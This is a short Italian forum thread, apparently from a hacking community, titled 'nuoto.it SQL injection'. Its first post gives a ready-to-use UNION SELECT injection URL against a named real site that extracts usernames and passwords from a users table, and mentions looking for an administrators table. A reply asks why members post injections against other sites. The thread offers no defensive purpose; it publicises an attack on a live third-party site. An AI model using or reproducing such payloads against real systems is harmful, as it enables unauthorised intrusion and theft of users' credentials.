nuoto.it SQL injection

Stato
Discussione chiusa ad ulteriori risposte.

imported_Bronsa

Utente Silver
28 Ottobre 2007
108
6
0
82
Codice:
http://www.nuoto.it/leggi.php?leggiID=-1%20union%20all%20select%201,2,3,nome,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20utenti/*


esiste anche la colonna amministratori ma non riesco a beccare i campi...
 
opz scusa, l'ho scritta dall'ipod touch...

intendevo:

" perchè postate le sql j. da vari siti?"

ho notato che ci sono molti post relativi a vulnerabilità su altri siti, e mi chiedevo come mai le postavate..
 
Stato
Discussione chiusa ad ulteriori risposte.